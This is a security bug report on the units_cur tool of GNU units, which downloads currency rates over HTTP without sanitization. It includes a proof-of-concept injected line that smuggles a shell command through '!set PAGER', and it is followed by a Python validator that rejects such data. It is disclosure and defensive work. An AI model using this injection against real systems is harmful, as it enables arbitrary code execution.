Control: forwarded adri...@gnu.org

Hi Adrian,

I thought you’d be interested in this bug report... A straightforward partial fix would be to switch to the https URIs, better still would be to add certificate validation of some sort, but I think a real fix would involve format validation and data sanitization (as Jakub mentions).

Regards,
Stephen

On Tue, 3 Jul 2018 18:55:40 +0200, Jakub Wilk <jw...@jwilk.net> wrote:
> Package: units
> Version: 2.17-1
> Tags: security
>
> units_cur does no sanitization of the data it downloads. Malicious
> operators of the servers or man-in-the-middle attackers[*] could exploit
> this to execute arbitrary code.
>
> As a proof of concept, I patched units_cur to emulate Yahoo returning
> malicious data. After updating the data, /var/lib/units/currency.units
> looks like this:
>
> southkoreawon 1|0
> !set PAGER cowsay${IFS}pwned;exit;
> # US$
>
> And this happens:
>
> $ units
> Currency exchange rates from finance.yahoo.com on 2018-07-03
> 3048 units, 109 prefixes, 109 nonlinear units
>
> You have: help kg
>  _______
> < pwned >
>  -------
>         \   ^__^
>          \  (oo)\_______
>             (__)\       )\/\
>                 ||----w |
>                 ||     ||
>
>
> [*] Conveniently, all the data is downloaded over HTTP, so there's no
> authentication.
>
> --
> Jakub Wilk
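The format validation Stephen and Jakub call for, as an added illustration that is not units_cur's own code: every downloaded rate must be a plain positive decimal before it is written into currency.units, so an injected `!set` directive never reaches the file. The line template `<name> 1|<rate> US$` and the unit-name pattern are assumptions taken from the PoC output above.

```python
import re
from decimal import Decimal

# Assumptions (added example, not the units_cur code): each rate arrives from the
# server as text, and currency.units lines follow the template seen in the PoC,
# "<unitname> 1|<rate> US$".  A malicious server can only influence <rate>.
UNIT_NAME_RE = re.compile(r"^[a-z][a-z0-9]{0,31}$")
# A plain positive decimal and nothing else: no '|', newline, '!' or shell text.
RATE_RE = re.compile(r"^[0-9]+(?:\.[0-9]+)?$")
LINE_TEMPLATE = "{name:<24}1|{rate} US$"

class BadCurrencyData(ValueError):
    """Raised when downloaded data does not match the expected format."""

def sanitize_rate(raw):
    """Return the rate as a canonical decimal string, or raise BadCurrencyData."""
    text = str(raw).strip()
    # fullmatch, not match: with match(), '$' would accept "0\n!set ..." because
    # '$' also matches just before a trailing newline.
    if not RATE_RE.fullmatch(text):
        raise BadCurrencyData("rate is not a plain decimal number: %r" % text)
    if Decimal(text) <= 0:          # "1|0" would be a division by zero in units
        raise BadCurrencyData("rate must be positive: %r" % text)
    return text

def build_currency_lines(rates):
    """Validate every (name, rate) pair; one bad entry aborts the whole update,
    so the previous currency.units stays intact instead of being half-written."""
    lines = []
    for name, raw in sorted(rates.items()):
        if not UNIT_NAME_RE.fullmatch(name):
            raise BadCurrencyData("invalid unit name: %r" % name)
        lines.append(LINE_TEMPLATE.format(name=name, rate=sanitize_rate(raw)))
    return lines

# Constructed sample data: two honest rates, and the injected value from the PoC.
HONEST_RATES = {"southkoreawon": "1116.4", "euro": "0.8574"}
MALICIOUS_RATES = {"southkoreawon": "0\n!set PAGER cowsay${IFS}pwned;exit;\n# "}

def update_is_safe(rates):
    """True if the data would be written, False if the update is refused."""
    try:
        build_currency_lines(rates)
        return True
    except BadCurrencyData:
        return False

if __name__ == "__main__":
    print("\n".join(build_currency_lines(HONEST_RATES)))
    print("malicious update accepted:", update_is_safe(MALICIOUS_RATES))
```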